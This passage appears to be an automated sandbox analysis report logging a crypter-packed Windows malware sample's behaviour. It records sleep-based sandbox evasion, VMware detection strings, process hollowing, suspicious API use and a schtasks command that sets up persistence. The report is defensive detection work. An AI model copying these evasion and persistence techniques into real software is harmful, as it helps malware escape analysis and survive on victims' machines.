Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98053s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -97893s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -97735s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -97594s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -97454s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -97297s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -97151s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -96085s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -95901s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -93632s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -93516s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -93344s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -93203s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -93089s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92977s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92875s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92766s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92656s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92547s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92437s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92328s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92219s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -92109s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Window / User API: threadDelayed 9837
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Window / User API: threadDelayed 9758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99859
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99734
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99623
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99388
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99252
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99130
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 99000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98888
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98779
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98671
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98558
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98406
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98281
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98164
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 98047
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97937
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97828
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97719
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97608
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97387
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 97031
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96918
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96624
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96514
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96406
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96294
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96186
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 96078
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95968
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95859
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95530
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95422
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95187
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 95078
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 94969
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 94812
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 94703
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 94593
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 94484
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99764
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99546
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99323
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99218
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99109
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 99000
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98725
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98604
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98484
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98296
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98186
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 98053
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 97893
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 97735
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 97594
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 97454
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 97297
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 97151
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 96085
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 95901
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 93632
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 93516
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 93344
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 93203
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 93089
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92977
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92875
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92766
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92656
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92547
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92437
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92328
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92219
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 92109
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_06925D08 LdrInitializeThunk, 11_2_06925D08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Reference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Reference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Reference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/C1.cs | Reference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/e2.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Memory written: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
